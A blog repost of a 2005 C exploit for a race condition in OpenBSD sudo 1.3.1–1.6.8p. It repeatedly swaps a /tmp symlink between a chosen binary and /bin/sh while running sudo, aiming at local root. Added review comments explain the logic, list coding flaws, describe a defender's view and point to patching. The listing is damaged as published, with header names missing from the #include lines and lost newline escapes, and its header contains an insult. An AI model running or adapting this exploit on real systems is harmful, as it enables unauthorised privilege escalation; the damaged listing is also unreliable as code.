
OpenBSD sudo 1.3.1 - 1.6.8p local root exploit

原创 Linux操作系统 作者:coolwinds 时间:2005-07-07 23:43:56 0 删除 编辑

/*
ANY MODIFIED REPUBLISHING IS RESTRICTED
OpenBSD sudo 1.3.1 - 1.6.8p local root exploit
Tested under OpenBSD 3.6 sudo 1.6.7p5
Vuln by OpenBSD errata, http://www.openbsd.org/errata.html
(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru
Race condition in path name, can take a while to exploit
Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince
Fuck lamerz: Saint_I, nmalykh
All rights reserved.
ANY MODIFIED REPUBLISHING IS RESTRICTED
*/


#include
#include
#include
#include
#include

/* Absolute path of the sudo binary that main() runs in its parent-side loop. */
#define SUDO "/usr/bin/sudo"
/*
 * Replace an existing BUFSIZ with 128; main() uses it as the capacity of the
 * command strings it formats with snprintf(). The override only happens when
 * BUFSIZ is already defined at this point. If no included header defines it,
 * the name stays undefined here.
 */
#ifdef BUFSIZ
#undef BUFSIZ
#define BUFSIZ 128
#endif

/*
 * Entry point of the proof-of-concept described in the file header, which the
 * author characterises as a path-name race condition in sudo.
 *
 * argv[1] is used as a symlink target and argv[2] as a file name under /tmp.
 * With any other argument count, usage text goes to stderr and EX_USAGE is
 * returned. Otherwise the process forks and both halves loop forever:
 *   - the child keeps re-pointing /tmp/<argv[2]> between argv[1] and /bin/sh;
 *   - the parent keeps running SUDO against /tmp/<argv[2]>.
 * Neither loop has an exit condition, and there is no explicit return after
 * them. A failed fork() (pid < 0) skips both branches and falls off the end.
 *
 * NOTE(review): the listing is damaged as published. The #include directives
 * above carry no header names, and the trailing "n" in the fprintf strings
 * looks like a newline escape that lost its backslash. Both are left as found.
 *
 * Defender view: the visible footprint is a symlink of one fixed name in /tmp
 * being created and deleted in a tight loop with alternating targets, next to
 * a rapid stream of sudo invocations on that same /tmp path. sudo's own
 * logging should show the repeated attempts (confirm against the local
 * logging configuration). Remediation is to run a sudo release newer than the
 * affected range in the header; the OpenBSD errata page cited there is the
 * vendor reference.
 */
int main (int argc, char ** argv)
{
pid_t pid;
/* buffer is declared but never used in this function. */
void * buffer;
char * exec, * race, * path;
/* Exactly two arguments are required. */
if(argc != 3)
{
fprintf(stderr, "r57sudo.c by __blfn");
fprintf(stderr, "RusH Security Teamn");
fprintf(stderr, "Usage: %s n", argv[0]);
fprintf(stderr, "e.g. ./r57sudo /bin/ls lsn");
return EX_USAGE;
}
pid = fork();
/* Child: endlessly swaps what /tmp/<argv[2]> points at. */
if(pid == 0)
{
while(1)
{
/*
 * Two fresh BUFSIZ-byte buffers are allocated on every iteration and never
 * freed, and the calloc() results are not checked, so memory use grows for as
 * long as the loop runs.
 */
exec = (char *)calloc(BUFSIZ, sizeof(char));
race = (char *)calloc(BUFSIZ, sizeof(char));
/*
 * exec and race are char pointers, so sizeof(exec) and sizeof(race) give the
 * pointer size, not BUFSIZ. These bzero() calls clear only the first few
 * bytes; calloc() already zeroed the whole buffer.
 */
bzero(exec, sizeof(exec));
/*
 * Each command is built by pasting argv[] into a shell string unquoted and is
 * run through system(), so any shell metacharacters in the arguments are
 * interpreted by the shell. Output beyond BUFSIZ-1 characters is silently
 * truncated by snprintf().
 */
/* Point the /tmp name at argv[1]. */
snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]);
system((char *)exec);
bzero(race, sizeof(race));
/* Remove the link. */
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
system((char *)race);
bzero(race, sizeof(race));
/* Point the same /tmp name at /bin/sh. */
snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]);
system((char *)race);
bzero(race, sizeof(race));
/* Remove the link again before the next round. */
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
system((char *)race);
}
}
/* Parent: endlessly runs sudo on the /tmp name while the child changes it. */
if(pid > 0)
{
while(1)
{
/* A new BUFSIZ/2-byte buffer per iteration, unchecked and never freed. */
path = (char *)calloc(BUFSIZ/2, sizeof(char));
snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
system((char *)path);
}
}
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801810/,如需转载,请注明出处,否则将追究法律责任。
